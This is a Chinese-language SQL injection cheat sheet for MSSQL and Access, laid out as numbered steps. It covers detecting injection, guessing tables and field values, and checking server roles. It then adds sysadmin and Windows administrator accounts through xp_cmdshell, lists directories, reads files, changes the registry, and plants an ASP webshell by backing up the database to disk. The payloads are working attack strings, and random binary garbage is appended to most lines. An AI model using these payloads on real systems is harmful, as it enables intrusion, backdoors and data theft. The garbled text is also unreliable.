1.判断是否有注入;and 1=1 ;and 1=2 T�I D�g�IK
2.初步判断是否是mssql ;and user>0 'h��j�Ed.
h.�X4x2�(.
3.注入参数是字符'and [查询条件] and ''=' �i]r(VKX��
)$:1e)���d
4.搜索时没过滤参数的'and [查询条件] and '%25'=' e�L�SzGbKf
�Ma|4nLC�}
5.判断数据库系统 �G�$>?UQ�[
ekh�v.;�N~
;and (select count(*) from sysobjects)>0 mssql �3��:x(2 A
A���0M�jk
;and (select count(*) from msysobjects)>0 access X(��ph�$,[
�t�Ly:F*1i
^xa, r#N:V
@q�'kKVJ�s
6.猜数据库 ;and (select Count(*) from [数据库名])>0 &��IQ=M.!r
uI-T]N:W8x
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �P+j��=]Yg
�}*6�BaB�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ��=IC.FT�}
mITB\,�,G�
9.(1)猜字段的ascii值(access) @PvO;]]�%�
o^@"eG�$,
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 'GJB9i+�a^
�[��h3xW�
(2)猜字段的ascii值(mssql) h9�Far8}��
!k�E5]<H�\
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 P$�o��bID�
`DY
yK?R�
10.测试权限结构(mssql) ,s~�l; Gkj
5?-HQoT�)G
bgor�W�"�'
wD9K\%jIr!
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- N_c44[�z�1
M�1k�A-�Xr
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- {]Zan'{PCO
��5.6t�Vr�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- (�{!!b"B2�
""-w�M�~^D
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �}YD�i/�b7
5tl�R��rf
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 1tN�L)x"�w
%��Ln�`c.C
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- :�.x((
F�U
e�f�Q8�jO�
;and 1=(select IS_MEMBER('db_owner'));-- � �aO&U=�!
5��%Qxx\�q
*2z�p>(%��
B�mX'%�5ho
11.添加mssql和系统的帐户 a��#j,0FKv
N1~�bp?$1�
;exec master.dbo.sp_addlogin username;-- y&�$��n[j
;exec master.dbo.sp_password null,username,password;-- �#|b�*l/t8
�wm`<�+K�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- t*(��b�F[?
x4^nT=?6�_
;exec master.dbo.xp_cmdshell 'net user username password D;Qx���9^.
{� ptd�OrN
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 1b9S�";ct0
^+m`mc�sE
;exec master.dbo.xp_cmdshell 'net user username password /add';-- L��E8<J�MB
*k�L�Fs|�U
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- /L^g.�� �~
b&rBWp�0�#
ps{4_V-3�u
�;b�{#$#`=
12.(1)遍历目录 �]���pR?/3
arL�>{�m�j
;create table dirs(paths varchar(100), id int) 7H3v[� f^Q
]M5~�p^ RB
;insert dirs exec master.dbo.xp_dirtree 'c:\' *ig�m��i9A
x��O��TvrX
;and (select top 1 paths from dirs)>0 �RC��R= W6
"h+Z�[h6T
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) &O'�W+4FAc
B(W���~]i�
Uc
t�lE>X`
0/Q_%
:���
(2)遍历目录 3�:WqUb\QK
%OB�W/�T�i
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- =<n ]��T�;
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 V+`kB�3GV�
gR�Y#pRT6d
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 b9�j}�Q�K
'�##?�PQ*u
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 tRo�Sq;VrS
At�.&�$� t
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 mo�| �D�
2)=wh�n�FS
eGEw�Xza 4
Jqz�oF}WH�
13.mssql中的存储过程 �rR��e��5Q
�W�2��2S/s
xp_regenumvalues 注册表根键, 子键 �+VUkV-kP�
2�b�$>1O&2
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 q�f0pi&q��
��Nh!`"B2B
xp_regread 根键,子键,键值名 oX�G�_6E!^
[\ao#f0�WR
;exec xp_regread \ja����6�g
�UX�c�t+l�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 .\�XRkr'�-
�t�yR?A>F4
xp_regwrite 根键,子键, 值名, 值类型, 值 � y<K�oc>8
�KtQs uL%�
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 IO\1nB$0nb
KT�m^}')C8
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 Cv,WG]E7(�
>e�G�g ��1
xp_regdeletevalue 根键,子键,值名 `
i[26Q��b
��1TZ[i���
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 MJ:c";KCq0
r)t�[QoD1�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �6Ryc&��z5
|ty&��}'6C
Z�[@ i/. I
t �utk*�|S
14.mssql的backup创建webshell �\��tgY2�:
��e4YfJd��
use model �@D9O�<��x
1n`�[D&?q�
create table cmd(str image); ? $B4'�wc5
K�m5�_P##
insert into cmd(str) values (''); Gld~Gy�B\k
H�9�T~7e�+
backup database model to disk='c:\l.asp'; _A�,_RM$�Y
(��>}1�t!1
�'D�f�s&sm
p\[!=ZXFr\
15.mssql内置函数 d*6f,�z2=�
�}U7IMON�U
;and (select @@version)>0 获得Windows的版本号 b�~.$1��oZ
Q6(~Vv�C-�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa 2O kID
WcM
!~E�/���Rp
;and (select user_name())>0 爆当前系统的连接用户 LW<Lg�N"L-
V6merT7�9
;and (select db_name())>0 得到当前连接的数据库 ci;2X�LA�M
mP^��B2"|q
�|��<{SSA�
�goR_\b
SU
16.简洁的webshell �J`5VE$2M
�(U�'n1s/X
use model ]O|>�nT��a
�0/��QDfA?
create table cmd(str image); oRbWqN`F.
��g]f�<k2�
insert into cmd(str) values (''); �29:2Xu �i
sPK�]:�i�C
backup database model to disk='g:\wwwtest\l.asp';
